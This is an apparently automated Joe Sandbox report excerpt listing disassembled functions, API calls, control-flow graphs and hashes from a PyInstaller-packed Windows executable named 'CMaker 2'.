                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF6FABFEF96,?,?,-00000018,00007FF6FABFA8DB,?,?,?,00007FF6FABFA7D2,?,?,?,00007FF6FABF5D5E), ref: 00007FF6FABFED78
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6FABFEF96,?,?,-00000018,00007FF6FABFA8DB,?,?,?,00007FF6FABFA7D2,?,?,?,00007FF6FABF5D5E), ref: 00007FF6FABFED84
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                  • Opcode ID: 273539b1e858eeecb2bd33ed0d4241c55d8440a82afd6c27fbd9155d092c88af
                                                                                                                                                                                  • Instruction ID: 7eae896d20d601a3cea864bc1705136c38d811f6b8af1151bfab60faeff8ed4f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 273539b1e858eeecb2bd33ed0d4241c55d8440a82afd6c27fbd9155d092c88af
                                                                                                                                                                                  • Instruction Fuzzy Hash: E041D469B19A0245FB15CB56A80067523A5BF86BA0F8C9579ED3ED7BD4FF3CE4058300
                                                                                                                                                                                  Function 00007FF6FABFB6D0 Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 750 7ff6fabfb6d0-7ff6fabfb6f6 751 7ff6fabfb711-7ff6fabfb715 750->751 752 7ff6fabfb6f8-7ff6fabfb70c call 7ff6fabfb0e8 call 7ff6fabfb108 750->752 754 7ff6fabfbaeb-7ff6fabfbaf7 call 7ff6fabfb0e8 call 7ff6fabfb108 751->754 755 7ff6fabfb71b-7ff6fabfb722 751->755 766 7ff6fabfbb02 752->766 774 7ff6fabfbafd call 7ff6fabfa4a4 754->774 755->754 757 7ff6fabfb728-7ff6fabfb756 755->757 757->754 760 7ff6fabfb75c-7ff6fabfb763 757->760 763 7ff6fabfb765-7ff6fabfb777 call 7ff6fabfb0e8 call 7ff6fabfb108 760->763 764 7ff6fabfb77c-7ff6fabfb77f 760->764 763->774 769 7ff6fabfb785-7ff6fabfb78b 764->769 770 7ff6fabfbae7-7ff6fabfbae9 764->770 772 7ff6fabfbb05-7ff6fabfbb1c 766->772 769->770 771 7ff6fabfb791-7ff6fabfb794 769->771 770->772 771->763 775 7ff6fabfb796-7ff6fabfb7bb 771->775 774->766 778 7ff6fabfb7ee-7ff6fabfb7f5 775->778 779 7ff6fabfb7bd-7ff6fabfb7bf 775->779 783 7ff6fabfb7ca-7ff6fabfb7e1 call 7ff6fabfb0e8 call 7ff6fabfb108 call 7ff6fabfa4a4 778->783 784 7ff6fabfb7f7-7ff6fabfb81f call 7ff6fabfd444 call 7ff6fabfa0e4 * 2 778->784 781 7ff6fabfb7c1-7ff6fabfb7c8 779->781 782 7ff6fabfb7e6-7ff6fabfb7ec 779->782 781->782 781->783 786 7ff6fabfb86c-7ff6fabfb883 782->786 815 7ff6fabfb974 783->815 811 7ff6fabfb821-7ff6fabfb837 call 7ff6fabfb108 call 7ff6fabfb0e8 784->811 812 7ff6fabfb83c-7ff6fabfb867 call 7ff6fabfbef8 784->812 789 7ff6fabfb885-7ff6fabfb88d 786->789 790 7ff6fabfb8fe-7ff6fabfb908 call 7ff6fac0371c 786->790 789->790 795 7ff6fabfb88f-7ff6fabfb891 789->795 803 7ff6fabfb992 790->803 804 7ff6fabfb90e-7ff6fabfb923 790->804 795->790 799 7ff6fabfb893-7ff6fabfb8a9 795->799 799->790 800 7ff6fabfb8ab-7ff6fabfb8b7 799->800 800->790 805 7ff6fabfb8b9-7ff6fabfb8bb 800->805 807 7ff6fabfb997-7ff6fabfb9b7 ReadFile 803->807 804->803 809 7ff6fabfb925-7ff6fabfb937 GetConsoleMode 804->809 805->790 810 7ff6fabfb8bd-7ff6fabfb8d5 805->810 813 7ff6fabfbab1-7ff6fabfbaba GetLastError 807->813 814 7ff6fabfb9bd-7ff6fabfb9c5 807->814 809->803 816 7ff6fabfb939-7ff6fabfb941 809->816 810->790 818 7ff6fabfb8d7-7ff6fabfb8e3 810->818 811->815 812->786 823 7ff6fabfbabc-7ff6fabfbad2 call 7ff6fabfb108 call 7ff6fabfb0e8 813->823 824 7ff6fabfbad7-7ff6fabfbada 813->824 814->813 820 7ff6fabfb9cb 814->820 817 7ff6fabfb977-7ff6fabfb981 call 7ff6fabfa0e4 815->817 816->807 822 7ff6fabfb943-7ff6fabfb965 ReadConsoleW 816->822 817->772 818->790 827 7ff6fabfb8e5-7ff6fabfb8e7 818->827 831 7ff6fabfb9d2-7ff6fabfb9e7 820->831 833 7ff6fabfb967 GetLastError 822->833 834 7ff6fabfb986-7ff6fabfb990 822->834 823->815 828 7ff6fabfbae0-7ff6fabfbae2 824->828 829 7ff6fabfb96d-7ff6fabfb96f call 7ff6fabfb07c 824->829 827->790 837 7ff6fabfb8e9-7ff6fabfb8f9 827->837 828->817 829->815 831->817 839 7ff6fabfb9e9-7ff6fabfb9f4 831->839 833->829 834->831 837->790 843 7ff6fabfba1b-7ff6fabfba23 839->843 844 7ff6fabfb9f6-7ff6fabfba0f call 7ff6fabfb2e8 839->844 847 7ff6fabfba25-7ff6fabfba37 843->847 848 7ff6fabfba9f-7ff6fabfbaac call 7ff6fabfb128 843->848 852 7ff6fabfba14-7ff6fabfba16 844->852 849 7ff6fabfba92-7ff6fabfba9a 847->849 850 7ff6fabfba39 847->850 848->852 849->817 853 7ff6fabfba3e-7ff6fabfba45 850->853 852->817 855 7ff6fabfba81-7ff6fabfba8c 853->855 856 7ff6fabfba47-7ff6fabfba4b 853->856 855->849 857 7ff6fabfba4d-7ff6fabfba54 856->857 858 7ff6fabfba67 856->858 857->858 859 7ff6fabfba56-7ff6fabfba5a 857->859 860 7ff6fabfba6d-7ff6fabfba7d 858->860 859->858 861 7ff6fabfba5c-7ff6fabfba65 859->861 860->853 862 7ff6fabfba7f 860->862 861->860 862->849
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: a28cd08252ad5064423087568c49e9a7316f24dfb60174969f3a4ac2ff351578
                                                                                                                                                                                  • Instruction ID: c3002f006280d611fb7b514197dee55ad8e5b0a7fff8853a383ef1c7cba59764
                                                                                                                                                                                  • Opcode Fuzzy Hash: a28cd08252ad5064423087568c49e9a7316f24dfb60174969f3a4ac2ff351578
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BC1D52AA0C78789EB509B95D4402BD7B90EF82B80FDD4179DA6D837D1EE7DE845C700
                                                                                                                                                                                  Function 00007FF6FABE6D20 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 995526605-0
                                                                                                                                                                                  • Opcode ID: 6d514f459d47cfe2cf0c15e0a3103aa6adbf6aa1491c99449bd82d5f21bc2020
                                                                                                                                                                                  • Instruction ID: 38e3965ec0dceb2b969462d85f5543efb11a0461e5708e0d7f90792d12168cf7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d514f459d47cfe2cf0c15e0a3103aa6adbf6aa1491c99449bd82d5f21bc2020
                                                                                                                                                                                  • Instruction Fuzzy Hash: A0217F71A0C64242EB109B55E49023AA3A0FF967A4F9482B5EABDC3AE4EF7CD4548700
                                                                                                                                                                                  Function 00007FF6FABE25A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF6FABE26F4), ref: 00007FF6FABE25D1
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE1ED0: GetLastError.KERNEL32 ref: 00007FF6FABE1EEC
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE1ED0: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FABE25EE,?,00007FF6FABE26F4), ref: 00007FF6FABE1F56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileFormatLastMessageModuleName
                                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                  • API String ID: 1234058594-2863816727
                                                                                                                                                                                  • Opcode ID: 3ab6da95184e74374fe48baec535fe5bf269d99fd8fb3e70c2c2714cf1ced2a1
                                                                                                                                                                                  • Instruction ID: 7e53c6e92e006c02139f355eacdbe8c77db174c9963b0569700789ef8149ba67
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ab6da95184e74374fe48baec535fe5bf269d99fd8fb3e70c2c2714cf1ced2a1
                                                                                                                                                                                  • Instruction Fuzzy Hash: FE216061B1C64281FF24DB35E8913B92261AF6A394FC042B6E67EC65DAFE2CE504C700
                                                                                                                                                                                  Function 00007FF6FABE7490 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetCurrentProcess.KERNEL32 ref: 00007FF6FABE6D40
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: OpenProcessToken.ADVAPI32 ref: 00007FF6FABE6D53
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetTokenInformation.KERNELBASE ref: 00007FF6FABE6D78
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetLastError.KERNEL32 ref: 00007FF6FABE6D82
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: GetTokenInformation.KERNELBASE ref: 00007FF6FABE6DC2
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6FABE6DDE
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE6D20: CloseHandle.KERNEL32 ref: 00007FF6FABE6DF6
                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00007FF6FABE2A89), ref: 00007FF6FABE751C
                                                                                                                                                                                  • LocalFree.KERNEL32 ref: 00007FF6FABE7525
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                  • Opcode ID: 60c4fd39fcac6d8e283f4d7189cc44c35b978d9b95943a5d7ecd7241549dd8e4
                                                                                                                                                                                  • Instruction ID: b992a89898bb565822ee14b12bf8dcc684925b86b11fbfce38b7434a957f9b2c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 60c4fd39fcac6d8e283f4d7189cc44c35b978d9b95943a5d7ecd7241549dd8e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: FD215C71A1864282FB10AB10E8553FA62A5EF89780F8494B5EA6EC37D6FF3CD944C740
                                                                                                                                                                                  Function 00007FF6FABE6700 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(00000000,?,00007FF6FABE240C,?,?,00007FF6FABE2BD3), ref: 00007FF6FABE6812
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                                  • Opcode ID: 3bc923c488289a14523a6baf9d9f11372388867e082ec78953b2be25e99915c4
                                                                                                                                                                                  • Instruction ID: 1a3b312fc1ceecaeac6e5876e9b18934c519b93c8afc7e6687d8259a19f95204
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bc923c488289a14523a6baf9d9f11372388867e082ec78953b2be25e99915c4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6931C661B19AC145EB219B21E4A03AA6368EF45BE0F8442B1EE7D837C5FF2CD6458700
                                                                                                                                                                                  Function 00007FF6FABFCBE0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABFCBCB), ref: 00007FF6FABFCCFC
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABFCBCB), ref: 00007FF6FABFCD87
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                  • Opcode ID: c31540d1621b960633301173278a43c162921b7fbac8ddbd441109263ef94ee1
                                                                                                                                                                                  • Instruction ID: 5abbc83ef5618b1f62f7c50210971ff04dcbf3ec099f590f37ed649e21fae4ce
                                                                                                                                                                                  • Opcode Fuzzy Hash: c31540d1621b960633301173278a43c162921b7fbac8ddbd441109263ef94ee1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7591D87AE0865185F750CFA5A4442BD2BA0BB47B88F98517DDE2E96AC4EF38E4D1C700
                                                                                                                                                                                  Function 00007FF6FABFF88C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                  • Opcode ID: fdd97bbf6e68edbfd0100966c197f3e4f5c5660e1dd8c7e86fc9ba11ac3620d6
                                                                                                                                                                                  • Instruction ID: e9af51909ecaf57304369aa243da24b73cf1d51fcebe3604fb00abdc1c0d1e70
                                                                                                                                                                                  • Opcode Fuzzy Hash: fdd97bbf6e68edbfd0100966c197f3e4f5c5660e1dd8c7e86fc9ba11ac3620d6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 19510676F042518AEB14CFB499856BC27B5AB0535AF94427ADD3E92AE5FF3CA402C700
                                                                                                                                                                                  Function 00007FF6FABF5598 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                  • Opcode ID: 6269b5f41561535a3e7af7ec4f39afc7b18a23eacddf722dddb7d9db96079186
                                                                                                                                                                                  • Instruction ID: b5eb429c5e4092b119cacf4cea2f5e13590e17d726c14311ddacbf50a876947a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6269b5f41561535a3e7af7ec4f39afc7b18a23eacddf722dddb7d9db96079186
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1651AF26E186018AFB10CFB0D9503BD37B5AF49B48F588279DE29CB6C9EF38E4408740
                                                                                                                                                                                  Function 00007FF6FABF5444 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                  • Opcode ID: 3281e8f863b45228ded96b763e46d2b137e088969c29cf3df985d9b24e13a4ae
                                                                                                                                                                                  • Instruction ID: eac6bdee25a9925612cf5e5445845f9d139d0e8daf377f125f5d5eaf104486b5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3281e8f863b45228ded96b763e46d2b137e088969c29cf3df985d9b24e13a4ae
                                                                                                                                                                                  • Instruction Fuzzy Hash: A541A176D1C78283E7108BA0D5103696660FB963A4F549379E6BC83AD6EF6CA5E08700
                                                                                                                                                                                  Function 00007FF6FABF95E8 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
